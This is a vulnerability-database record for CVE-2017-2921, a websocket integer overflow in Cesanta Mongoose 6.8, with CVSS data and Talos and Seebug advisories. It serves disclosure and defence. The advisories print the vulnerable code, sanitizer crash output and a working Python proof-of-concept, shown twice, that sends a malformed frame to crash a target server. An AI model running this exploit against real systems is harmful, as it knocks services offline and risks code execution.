An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.
{"id": "CVE-2017-2921", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2017-2921", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "published": "2017-11-07T16:29:00", "modified": "2022-06-13T19:16:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2921", "reporter": "talos-cna@cisco.com", "references": ["https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428"], "cvelist": ["CVE-2017-2921"], "immutableFields": [], "lastseen": "2022-06-13T20:35:31", "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2921"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-2893", "RH:CVE-2017-2921"]}, {"type": "seebug", "idList": ["SSV:96808"]}, {"type": "talos", "idList": ["TALOS-2017-0428"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BF9B74979C194FA29647576078478DE0"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2921"]}]}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2921"]}, {"type": "seebug", "idList": ["SSV:96808"]}, {"type": "talos", "idList": ["TALOS-2017-0428"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BF9B74979C194FA29647576078478DE0"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2921"]}]}, "exploitation": null, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/threatintelctr/status/1536434044543479808", "text": " NEW: CVE-2017-2921 An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, le... (click for more) Severity: CRITICAL https://t.co/3s3k8jaes3", "author": "threatintelctr", "author_photo": "https://pbs.twimg.com/profile_images/904224973987840000/dMy1x9Ho_400x400.jpg"}, {"link": "https://twitter.com/WolfgangSesin/status/1536556828234072065", "text": "New post from https://t.co/uXvPWJy6tj (CVE-2017-2921 (mongoose)) has been published on https://t.co/VvUodXl8L9", "author": "WolfgangSesin", "author_photo": "https://pbs.twimg.com/profile_images/957011635369054208/Om3jbj7z_400x400.jpg"}, {"link": "https://twitter.com/www_sesin_at/status/1536556829802737664", "text": "New post from https://t.co/9KYxtdZjkl (CVE-2017-2921 (mongoose)) has been published on https://t.co/YACjoOdfY4", "author": "www_sesin_at", "author_photo": "https://pbs.twimg.com/profile_images/958100963822329858/fb_N8h5n_400x400.jpg"}]}, "vulnersScore": 4.2}, "_state": {"dependencies": 1660004461, "twitter": 1655180698, "score": 1659843777}, "_internal": {"score_hash": "105765eae402310ba6ea66a4664a1b0f"}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 8.1}}}, "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"], "cwe": ["CWE-190"], "affectedSoftware": [{"cpeName": "cesanta:mongoose", "version": "6.8", "operator": "eq", "name": "cesanta mongoose"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "name": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "refsource": "MISC", "tags": ["Exploit", "Technical Description", "Third Party Advisory"]}]}
{"talos": [{"lastseen": "2022-06-13T22:03:01", "description": "### Summary\n\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nAfter the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.\n \n \n Function `mg_deliver_websocket_data` is responsible for parsing the websocket packet. Relevant code is:\n \n \n \n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len, [1]\n mask_len = 0, header_len = 0;\n ...\n if (buf_len >= 2) \n ...\n else if (buf_len >= 10 + mask_len) \n header_len = 10 + mask_len; [2]\n data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) + [3]\n ntohl(*(uint32_t *) &buf[6]);\n \n \n \n frame_len = header_len + data_len; [4]\n ok = frame_len > 0 && frame_len <= buf_len; [5]\n \n if (ok) \n ...\n /* Apply mask if necessary */\n if (mask_len > 0) { \n for (i = 0; i < data_len; i++) \n buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4]; [6]\n \n\nIn the above code, we can see at [1] local variables `frame_len`, `header_len` and `data_len` being declared as 64bit unsigned integers. At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], total `frame_len` is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.\n\nAn insufficient check above at [5] can allow for an integer overflow to pass undetected. In case `data_len`is a very large value, adding `header_len` to it can lead to integer wraparound , resulting in small `frame_len` value. Small `frame_len` value passes `frame_len <= buf_len` check, while `data_len` is still huge and bigger than the actual buffer size. This results in a large heap overflow at [6] as the for loop is bounded by `data_len` only.\n\nThis causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.\n\n### Crash Information\n \n \n Address sanitizer output:\n \n ==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp \n 0x7fffffffb488\n READ of size 1 at 0x619000006380 thread T0\n #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866\n #1 0x51abad in ?? ??:0\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\n #3 0x5128d4 in ?? ??:0\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\n #5 0x4f9de6 in ?? ??:0\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\n #7 0x4fdcf9 in ?? ??:0\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\n #11 0x506603 in ?? ??:0\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #13 0x509dd8 in ?? ??:0\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #15 0x4fb695 in ?? ??:0\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\n #17 0x4ea65a in ?? ??:0\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #19 0x7ffff6ee582f in ?? ??:0\n #20 0x418e58 in _start ??:?\n #21 0x418e58 in ?? ??:0\n \n \n 0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)\n allocated by thread T0 here:\n #0 0x4b8f88 in __interceptor_malloc ??:?\n #1 0x4b8f88 in ?? ??:0\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\n #4 0x506453 in ?? ??:0\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #6 0x509dd8 in ?? ??:0\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #8 0x4fb695 in ?? ??:0\n #4 0x60200000efef (<unknown module>)\n \n SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)\n Shadow bytes around the buggy address:\n 0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n =>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n Shadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Heap right redzone: fb\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n ==88164==ABORTING\n \n\n### Exploit Proof-of-Concept\n \n \n import socket\n import struct\n import sys\n http_upgrade = ('GET /chat HTTP/1.1\\r\\n'\n 'Host: server.example.com\\r\\n'\n 'Upgrade: websocket\\r\\n'\n 'Connection: Upgrade\\r\\n'\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\n 'Sec-WebSocket-Version: 13\\r\\n'\n 'Origin: http://example.com\\r\\n\\r\\n')\n #only HTTP \"Upgrade: websocket\" header matters above, the above GET request was copied verbatim from wikipedia\n \n \n payload = \"\\x00\" # FIN flag doesn't matter, opcode doesn't matter\n payload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len\n payload_len = 0xffffffffffffffff -12 #actual payload len\n payload += struct.pack(\"!Q\",payload_len)\n masking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit\n payload += struct.pack(\"I\",masking_key)\n payload += \"A\"*40 #garbage to pad the packet\n \n \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.send(http_upgrade)\n print s.recv(1024)\n s.send(payload)\n print s.recv(1024)\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0428", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:55:15", "description": "An exploitable memory corruption vulnerability exists in the Websocket\nprotocol implementation of Cesanta Mongoose 6.8. A specially crafted\nwebsocket packet can cause an integer overflow, leading to a heap buffer\noverflow and resulting in denial of service and potential remote code\nexecution. An attacker needs to send a specially crafted websocket packet\nover network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2921", "href": "https://ubuntu.com/security/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T06:02:23", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2921", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:55:42", "description": "### Summary\r\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-190: Integer Overflow or Wraparound\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nAfter the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.\r\n\r\nFunction `mg_deliver_websocket_data` is responsible for parsing the websocket packet. Relevant code is:\r\n```\r\nuint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len, [1]\r\n mask_len = 0, header_len = 0;\r\n ...\r\n if (buf_len >= 2) \r\n ...\r\n else if (buf_len >= 10 + mask_len) \r\n header_len = 10 + mask_len; [2]\r\n data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) + [3]\r\n ntohl(*(uint32_t *) &buf[6]);\r\n\r\n\r\n\r\nframe_len = header_len + data_len; [4]\r\n ok = frame_len > 0 && frame_len <= buf_len; [5]\r\n\r\n if (ok) \r\n ...\r\n /* Apply mask if necessary */\r\n if (mask_len > 0) { \r\n for (i = 0; i < data_len; i++) \r\n buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4]; [6]\r\n```\r\n\r\nIn the above code, we can see at [1] local variables `frame_len`, `header_len` and `data_len` being declared as 64bit unsigned integers. At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], total `frame_len` is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.\r\n\r\nAn insufficient check above at [5] can allow for an integer overflow to pass undetected. In case `data_len` is a very large value, adding header_len to it can lead to integer wraparound , resulting in small `frame_len` value. Small `frame_len` value passes `frame_len` <= buf_len check, while data_len is still huge and bigger than the actual buffer size. This results in a large heap overflow at [6] as the for loop is bounded by `data_len` only.\r\n\r\nThis causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.\r\n\r\n### Crash Information\r\n```\r\nAddress sanitizer output:\r\n\r\n==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp \r\n0x7fffffffb488\r\nREAD of size 1 at 0x619000006380 thread T0\r\n #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866\r\n #1 0x51abad in ?? ??:0\r\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\r\n #3 0x5128d4 in ?? ??:0\r\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\r\n #5 0x4f9de6 in ?? ??:0\r\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\r\n #7 0x4fdcf9 in ?? ??:0\r\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\r\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\r\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\r\n #11 0x506603 in ?? ??:0\r\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #13 0x509dd8 in ?? ??:0\r\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #15 0x4fb695 in ?? ??:0\r\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\r\n #17 0x4ea65a in ?? ??:0\r\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\r\n #19 0x7ffff6ee582f in ?? ??:0\r\n #20 0x418e58 in _start ??:?\r\n #21 0x418e58 in ?? ??:0\r\n\r\n\r\n0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)\r\nallocated by thread T0 here:\r\n #0 0x4b8f88 in __interceptor_malloc ??:?\r\n #1 0x4b8f88 in ?? ??:0\r\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\r\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\r\n #4 0x506453 in ?? ??:0\r\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #6 0x509dd8 in ?? ??:0\r\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #8 0x4fb695 in ?? ??:0\r\n #4 0x60200000efef (<unknown module>)\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)\r\nShadow bytes around the buggy address:\r\n0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\nAddressable: 00\r\nPartially addressable: 01 02 03 04 05 06 07\r\nHeap left redzone: fa\r\nHeap right redzone: fb\r\nFreed heap region: fd\r\nStack left redzone: f1\r\nStack mid redzone: f2\r\nStack right redzone: f3\r\nStack partial redzone: f4\r\nStack after return: f5\r\nStack use after scope: f8\r\nGlobal redzone: f9\r\nGlobal init order: f6\r\nPoisoned by user: f7\r\nContainer overflow: fc\r\nArray cookie: ac\r\nIntra object redzone: bb\r\nASan internal: fe\r\nLeft alloca redzone: ca\r\nRight alloca redzone: cb\r\n==88164==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability(CVE-2017-2921)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96808", "id": "SSV:96808", "sourceData": "\n import socket\r\nimport struct\r\nimport sys\r\nhttp_upgrade = ('GET /chat HTTP/1.1\\r\\n'\r\n 'Host: server.example.com\\r\\n'\r\n 'Upgrade: websocket\\r\\n'\r\n 'Connection: Upgrade\\r\\n'\r\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\r\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\r\n 'Sec-WebSocket-Version: 13\\r\\n'\r\n 'Origin: http://example.com\\r\\n\\r\\n')\r\n#only HTTP \"Upgrade: websocket\" header matters above, the above GET request was copied verbatim from wikipedia\r\n\r\n\r\npayload = \"\\x00\" # FIN flag doesn't matter, opcode doesn't matter\r\npayload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len\r\npayload_len = 0xffffffffffffffff -12 #actual payload len\r\npayload += struct.pack(\"!Q\",payload_len)\r\nmasking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit\r\npayload += struct.pack(\"I\",masking_key)\r\npayload += \"A\"*40 #garbage to pad the packet\r\n\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1],int(sys.argv[2])))\r\ns.send(http_upgrade)\r\nprint s.recv(1024)\r\ns.send(payload)\r\nprint s.recv(1024)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96808", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2022-05-21T01:24:59", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:50:57", "type": "redhatcve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:50:57", "id": "RH:CVE-2017-2893", "href": "https://access.redhat.com/security/cve/cve-2017-2893", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-05-21T01:24:59", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer 